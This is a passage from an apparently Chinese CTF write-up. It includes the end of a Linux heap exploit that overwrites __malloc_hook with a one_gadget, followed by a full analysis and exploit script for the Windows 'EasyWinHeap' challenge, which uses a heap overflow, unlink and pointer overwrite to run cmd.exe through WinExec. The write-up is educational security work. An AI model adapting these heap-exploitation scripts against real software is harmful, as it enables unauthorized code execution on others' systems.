    p.sendline(b"n")
    delete(0)
    delete(1)

    start()
    p.recv(13)
    unsorted_arena = u64(p.recv(6).ljust(8,b"\x00"))
    libc_base = unsorted_arena - 0x3C4B20 - 0x58
    fake_chunk_start = libc_base + 0x3C4AED
    one_gadget = libc_base + 0xf1147
    malloc_hook = libc_base + 0x3c4b10
    print("unsorted_arena",hex(unsorted_arena))
    print("libc_base",hex(libc_base))
    print("fake_chunk_start",hex(fake_chunk_start))
    print("one_gadget",hex(one_gadget))
    print("malloc_hook",hex(malloc_hook))

    play2die()

    words = b"123123"
    p.sendline(words)
    p.recvuntil(b"if you want to exit?\n")
    p.sendline(b"n")

    add(0,0x50,b"AAAAAAAA")
    add(1,0x20,p64(0)+p64(0x71)+p64(fake_chunk_start))


    add(3,0x60,b"DDDDDDDD")
    add(4,0x60,b"A"*0x13+p64(one_gadget))
    print("one_gadget",hex(one_gadget))
    print("malloc_hook",hex(malloc_hook))

    p.recvuntil(b"4.start name\n")
    p.sendline(b"1")
    p.recvuntil(b"index?\n")
    p.sendline(str(5).encode())
    p.recvuntil(b"how long?\n")
    p.sendline(str(16).encode())
    p.interactive()

if __name__ == "__main__":
    exp()

EasyWinHeap

这题比赛的时候没做…比赛结束后搭建了好久的winpwn环境,然后向sad学习了一下windbg的调试。

?

关于windows的很多机制,之前没了解过,大部分来自于网上一点点的资料,还有《程序员的自我修养》。所以讲不了很详细,如果哪位师傅有详细的win堆管理机制学习资料劳烦嫖一份~

分析

程序逻辑不复杂,甚至存在很多漏洞

  1. alloc的时候将将 puts函数指针 | ((size>>4)+1) 之后和堆指针一起放置在堆上。然后在show的时候通过&0xFFFFFFF0 运算还原函数指针,然后puts堆上内容。(其实调试的时候发现函数指针最低位的变化不用考虑,应该只是做混淆)
    附:堆上指针保存位置
0:004> dd 0x1270490 0x1270600 
01270490  b1dc07df 080013cd 00011048 
01270520 012704a0  00011048 01270530 
00011048 01270540 012704b0  00011048 
01270550 00011048 01270560 012704c0  
00011048 01270570 00000000 00000000
  1. alloc的size并不是输入的size,而是之前的(size>>4)+1,但是edit的时候却是按照size长度来输入。明显存在堆溢出。
  2. 考虑修改堆上的puts指针为system或winexev的指针,然后把堆内容写"cmd.exe"作为参数(在我的系统版本,system地址包含了\x0a,导致输入会被破坏,于是只能使用winexec)。而winexev在kernel32中,和HeapFree一样,于是需要先泄露HeapFree的地址来计算偏移。既然要泄露HeapFree地址,就要把堆上保存的堆指针覆盖为HeapFree的iat地址。既然需要控制堆上指针,就需要构造unlink(win下的unlink与Linux稍有不同,主要是fd和bk都指向用户可控区域)。
    附:堆结构
01270510  00000000 00000000 a2dc07cc 
0800134e 01270520  012700c0 012700c0 
a2dc07cc 0800135d 01270530  012700c0 
012700c0 a3dd07cc 0000135d 01270540  
01270580 01270560 a2dc07cc 0800135d 
01270550  012700c0 012700c0 a3dd07cc 
0000135d 01270560  01270540 012700c0 
a2dc07cc 0800135d 01270570  012700c0 
012700c0 efdd0483 0000135d 01270580  
012700c0 01270540 00000000 00000000 
01270590  00000000 00000000 00000000 
00000000
  1. unlink构造完后就可以达成任意读写,这时只需要泄露出puts指针,计算出image_base,就衔接上了第三点的逻辑。
  2. 需要注意的是,由于edit输入后,末尾会存在00截断,导致破坏堆上原有内容,所以需要合理安排堆布局,并通过泄露部分内容以便在输入时顺便修补(详见EXP)。

EXP

from winpwn import *
context.arch='i386'
#context.log_level='debug'
context.windbg="C:\\Program Files\\WindowsApps\\Microsoft.WinDbg_1.2001.2001.0_neutral__8wekyb3d8bbwe\\DbgX.Shell.exe"
p=process("./EasyWinHeap.exe")

#windbg.attach(p)

def add(size):
    p.recvuntil("option >")
    p.sendline("1")
    p.sendline(str(size))
def free(index):
    p.recvuntil("option >")
    p.sendline("2")
    p.recvuntil("index >")
    p.sendline(str(index))
def show(index):
    p.recvuntil("option >")
    p.sendline("3")
    p.recvuntil("index >")
    p.sendline(str(index))
def edit(index,content):
    p.recvuntil("option >")
    p.sendline("4")
    p.recvuntil("index >")
    p.sendline(str(index))
    p.recvuntil("content  >")
    p.sendline(content)

add(0x70) #idx0
add(0x70) #idx1
add(0x70) #idx2
add(0x70) #idx3
add(0x70) #idx4
add(0x70) #idx5
#windbg.attach(p)
free(2)
free(4)
#windbg.attach(p)
show(2)   #过滤换行

p.recvuntil("\r\n")
ret = p.recvuntil("\r\n")
print("len(ret):",len(ret))
heap_base = u32(ret[:4]) - 0x580
idx2pptr = heap_base + 0x4a0 + 0x4*3 #0x4ac

print("heap_base:", hex(heap_base)) #泄露堆地址
print("idx2pptr:", hex(idx2pptr))

#伪造指针
#这里的ret[8:12]就是上一步额外泄露的内容,目的是修补堆块
edit(2, p32(idx2pptr-0x4)+p32(idx2pptr)+ret[8:12]) 
#windbg.attach(p)
#dd 0x1270490 0x1270600
#unlink
free(1)

#leak image_base & winexec/system
edit(2, p32(idx2pptr+0x10))
#windbg.attach(p)

show(2)
p.recvuntil("\r\n") #过滤换行
p.recv(4)
image_leak = u32(p.recv(3).ljust(4,"\x00"))
image_base = image_leak - 0x1048
idata_heapfree = image_base + 0x2004
print("image_leak:", hex(image_leak))
print("image_base:", hex(image_base))
print("idata_heapfree:", hex(idata_heapfree))

edit(2, p32(idata_heapfree))
#windbg.attach(p)
show(4)
p.recvuntil("\r\n") #过滤换行
heapfree = u32(p.recv(4))
winexec = heapfree - 0x11D10 + 0x5EA90
print("puts:", hex(heapfree))
print("winexec:", hex(winexec))

edit(3, "cmd.exe")
edit(2, p32(idx2pptr+0x4))
edit(4, p32(winexec)+p32(heap_base+0x550))
#windbg.attach(p)
p.recvuntil("option >")
p.sendline("3")

p.interactive()

注意该exp对堆地址字节数有限制(4字节),所以有时要多跑几遍。